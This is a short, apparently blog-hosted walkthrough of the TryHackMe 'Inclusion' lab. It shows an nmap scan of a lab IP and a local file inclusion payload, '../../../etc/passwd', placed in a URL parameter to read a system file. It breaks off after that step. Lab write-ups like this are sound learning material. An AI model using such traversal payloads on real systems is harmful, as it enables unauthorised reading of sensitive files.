Sign in

Try Hack Me

Title — inclusion
vulnerability — Local file inclusion
Flag’s — root.txt -
user.txt -

ip address — 10.10.62.75

Lets start >>>

# lets scan the website by nmap
nmap -sS -sC -sV 10.10.62.75
# port 22
# port 80
# lets open web page open on port 80 in url
http://10.10.62.75
# found article’s on LFI & RFI
# we know that vulnerability is LFI
# change the parameter in url > the url looks like
10.10.62.75/article?name=lfi?article (now change the parameter and see)
10.10.62.75/article?name=../../../etc/passwd …

Cmuppin

Cyber security learner | CTF lover